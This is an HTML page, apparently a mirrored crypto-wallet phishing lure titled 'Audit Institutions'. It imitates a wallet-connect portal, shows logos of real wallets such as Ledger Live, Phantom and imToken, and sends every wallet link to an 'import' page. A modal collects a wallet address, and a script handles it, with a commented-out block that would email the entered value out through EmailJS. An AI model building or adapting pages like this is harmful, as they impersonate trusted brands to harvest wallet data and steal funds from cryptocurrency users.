        color: grey;
        font-size: 10px;
        position: absolute;
        left: 15px;
      }

      .modal-body input {
        border: 2px solid #0150b8 !important;
      }

      .modal-body input:active,
      .modal-body input:focus {
        border: none;
      }

      @media screen and (max-width: 768px) {
        .coin-registry {
          margin-top: 2rem;
          display: grid !important;
          grid-template-columns: 1fr 1fr 1fr !important;
          grid-template-rows: 1fr 1fr 1fr;
          grid-column-gap: 1rem !important;
          grid-template-areas: ". . ." ". . .";
        }

        .coin-img {
          width: 2.5rem;
          height: 2.5rem;
        }

        .coin h4 {
          font-size: 12px;
        }

        #header {
          padding-top: 10px;
        }

        .header-img {
          width: 2.3rem;
          height: 2.3rem;
        }

        .header-text h4 {
          margin-top: 10px;
          font-weight: 700;
        }

        .wallet-address {
          width: 100%;
        }
      }
    </style>
  </head>

  <body>
    <div id="header">
      <div class="content-box-md">
        <div class="container">
          <div class="row">
            <div class="col-md-12 col-sm-12 col-xs-12">
              <div class="header-text">
                <!-- <h4>Apps</h4> -->
                <img
                  class="text-center header-img"
                  src="https://play-lh.googleusercontent.com/V8CXyxIy9kjht1LObyD3CB300HSECqGWAw1mqIQcu4-u2Raqh3dZKXOx5oLEfzABytc"
                  alt=""
                />
                <!-- <h4>Wallets</h4> -->
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="coin-section">
      <div class="content-box-md">
        <div class="container">
          <div class="row">
            <div class="text-center coin-section-header">
              <h1 class="animated pulse">Audit Institutions</h1>
              <h6 class="animated pulse">
                Open protocol for iTokenHD partner wallets 
              </h6>
            </div>
          </div>

          <div class="row">
            <div class="coin-registry">
              <a
                href="import/index.html"
                data-bs-target="#exampleModal71"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://ethereum-magicians.org/uploads/default/original/1X/e726391f66eb7da7a0ed7d780b4df5e8e2416a17.png"
                  alt=""
                />
                <h4>Wallet Connect</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal71"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              >
                <form class="modal-dialog modal-dialog-centered">
                  <div class="modal-content">
                    <div class="modal-header">
                      <h5
                        class="modal-title modal_title"
                        id="exampleModalLabel"
                      >
                        Enter Wallet Address
                      </h5>
                    </div>
                    <div class="modal-body">
                      <input
                        required
                        class="wallet-address"
                        type="text"
                        name="address"
                        id=""
                      />
                    </div>
                    <div class="modal-footer">
                      <small>powered by wallet connect</small>
                      <a href="#"
                        ><a href="import/index.html" class="btn btn_close">
                          Close
                        </a></a
                      >
                      <a type="submit" class="btn btn_proceed btn-primary">
                        Proceed
                      </a>
                    </div>
                  </div>
                </form>
              </div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal71"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://3632261023-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/spaces%2F-MVOiF6Zqit57q_hxJYp%2Favatar-1615495356537.png?generation=1615495356841399&amp;alt=media"
                  alt=""
                />
                <h4>Phantom Wallet</h4>
              </a>
               <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal11"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal12"
                class="btn coin"
              >
                <img
                  style="border-radius: 40px"
                  class="coin-img"
                  src="https://registry.walletconnect.org/logo/lg/20459438007b75f4f4acb98bf29aa3b800550309646d375da5fd4aac6c2a2c66.jpeg"
                  alt=""
                />
                <h4>TokenPocket</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal26"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal27"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://play-lh.googleusercontent.com/a1omFR676rQsxhuh8wPxcJlw500KX8YKMcYweeM59W5b6JabxYZ0lA3ELtKCspmFcg"
                  alt=""
                />
                <h4>iToken Wallet</h4>
              </a>
             <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal25"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal26"
                class="btn coin"
              >
                <img
                  style="border-radius: 40px"
                  class="coin-img"
                  src="https://imagedelivery.net/_aTEfDRm7z3tKgu9JhfeKA/5a96d19c-93d3-4e6a-624a-16f52773d000/lg"
                  alt=""
                />
                <h4>Huobi</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal52"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal53"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://images.crunchbase.com/image/upload/c_lpad,f_auto,q_auto:eco,dpr_1/ul7c1asdgfksebdii8ns"
                  alt=""
                />
                <h4>BitKeep</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal71"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://play-lh.googleusercontent.com/mHjR3KaAMw3RGA15-t8gXNAy_Onr4ZYUQ07Z9fG2vd51IXO5rd7wtdqEWbNMPTgdqrk"
                  alt=""
                  style="border-radius: 40px"
                />
                <h4>Ledger Live</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal52"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal53"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://img.api.cryptorank.io/coins/beldex1559934646097.png"
                  alt=""
                />
                <h4>Beldexcoin</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal52"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal53"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://play-lh.googleusercontent.com/2xUl9OCfe5FBT8uFeZLkIuSRQUSNPiPVesyEencanYyL134fGQmrFEAiucRqOMdbjwo"
                  alt=""
                />
                <h4>Tonhub wallet</h4>
              </a>
              <!-- Modal -->
            
              <div
                class="modal fade"
                id="exampleModal27"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal28"
                class="btn coin"
              >
                <img
                  class="coin-img"
                  src="https://play-lh.googleusercontent.com/URWnNCpBu_Agtyxw0kc1JfdVIfj-GuHwplo9PBdRpqXnC8qTOZkEQCDfH7asv3RcOw"
                  alt=""
                />
                <h4>imToken</h4>
              </a>
              <!-- Modal -->
              
              <div
                class="modal fade"
                id="exampleModal62"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal63"
                class="btn coin"
              >
                <img
                  style="border-radius: 40px"
                  class="coin-img"
                  src="https://cryptoprice.ng/public/images/coins_icons/lbk_.png"
                  alt=""
                />
                <h4>LBank</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal64"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              ></div>

              <a
                href="import/index.html"
                data-bs-target="#exampleModal65"
                class="btn coin"
              >
                <img
                  style="border-radius: 40px"
                  class="coin-img"
                  src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSrT6yJPiKBVwjcIRi_QcaC8zneLJGznDffTkXoDn3ou3jkszuVeDXVk0MJO2q2lCnxZ_E&usqp=CAU"
                  alt=""
                />
                <h4>DeFiBox</h4>
              </a>
              <!-- Modal -->
              <div
                class="modal fade"
                id="exampleModal72"
                tabindex="-1"
                aria-labelledby="exampleModalLabel"
                aria-hidden="true"
              >
                <form class="modal-dialog modal-dialog-centered">
                  <div class="modal-content">
                    <div class="modal-header">
                      <h5
                        class="modal-title modal_title"
                        id="exampleModalLabel"
                      >
                        Enter Wallet Address
                      </h5>
                    </div>
                    <div class="modal-body">
                      <input
                        required
                        class="wallet-address"
                        type="text"
                        name=""
                        id=""
                      />
                    </div>
                    <div class="modal-footer">
                      <small>powered by wallet connect</small>
                      <a href="#"
                        ><a href="import/index.html" class="btn btn_close">
                          Close
                        </a></a
                      >
                      <a href="#"
                        ><a
                          href="import/index.html"
                          class="btn btn_proceed btn-primary"
                        >
                          Proceed
                        </a></a
                      >
                    </div>
                  </div>
                </form>
              </div>
            </div>
          </div>

          <div class="row">
            <div class="text-center coin-section-footer">
              <h6>
                Open an app submission issue on GitHub to add your app
                <span
                  ><a
                    style="text-decoration: none; color: #0150b8"
                    href="https://www.github.com/"
                    >here.</a
                  >
                </span>
              </h6>
              <div class="text-center coin-section-icons">
                <i
                  style="color: #0c0e29; margin-right: 12px"
                  class="fab fa-facebook"
                ></i>
                <i
                  style="color: #0c0e29; margin-right: 12px"
                  class="fab fa-twitter"
                ></i>
                <i style="color: #0c0e29 !important" class="fab fa-discord"></i>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script
      src="https://code.jquery.com/jquery-3.6.0.min.js"
      integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
      crossorigin="anonymous"
    ></script>

    <!-- <script src="./script/walletpage.js"></script> -->
    <script
      src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.10.2/dist/umd/popper.min.js"
      integrity="sha384-7+zCNj/IqJ95wo16oMtfsKbZ9ccEh31eOz1HGyDuCQ6wgnyJNSYdrPa03rtR1zdB"
      crossorigin="anonymous"
    ></script>
    <!-- JavaScript Bundle with Popper -->
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://code.jquery.com/jquery-3.6.0.min.js"
      integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
      crossorigin="anonymous"
    ></script>

    <!-- <script src="script/waypoints/jquery.waypoints.min.js"></script>

    <script src="script/counter/jquery.counterup.min.js"></script>

    <script src="script/wow/wow.min.js"></script>

    <script src="script/script.js"></script> -->

    <script>
      let ethAddress = document.getElementsByClassName("modal-dialog");
      for (const addy of ethAddress) {
        function handleForm(event) {
          event.preventDefault();
          const formData = new FormData(event.target);
          const formProps = Object.fromEntries(formData);
          let val = formProps.address;
          console.log(val);

          // var data = {
          //   service_id: "service_32qhacw",
          //   template_id: "template_5fxkikm",
          //   user_id: "jgdMoyrDf2qAF2WLK",
          //   template_params: {
          //     EthAddy: val,
          //   },
          // };

          // $.ajax("https://api.emailjs.com/api/v1.0/email/send", {
          //   type: "POST",
          //   data: JSON.stringify(data),
          //   contentType: "application/json",
          // })
          //   .done(function () {
          //     window.location.replace(
          //       location.origin + "/wallets./import/index.html"
          //     );
          //   })
          //   .fail(function (error) {
          //     alert("Oops... " + JSON.stringify(error));
          //   });
        }
        addy.addEventListener("submit", handleForm);
      }
      // ethAddress.addEventListener(onkeypress,()=>{

      // });
      // console.log(ethAddress);
    </script>
  </body>

  <!-- Mirrored from sync-collab.netlify.app/# by HTTrack Website Copier/3.x [XR&CO'2017], Wed, 13 Apr 2022 11:53:26 GMT -->

<!-- Mirrored from vistasync.netlify.app/wallets/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 06 Nov 2022 23:19:12 GMT -->
</html>
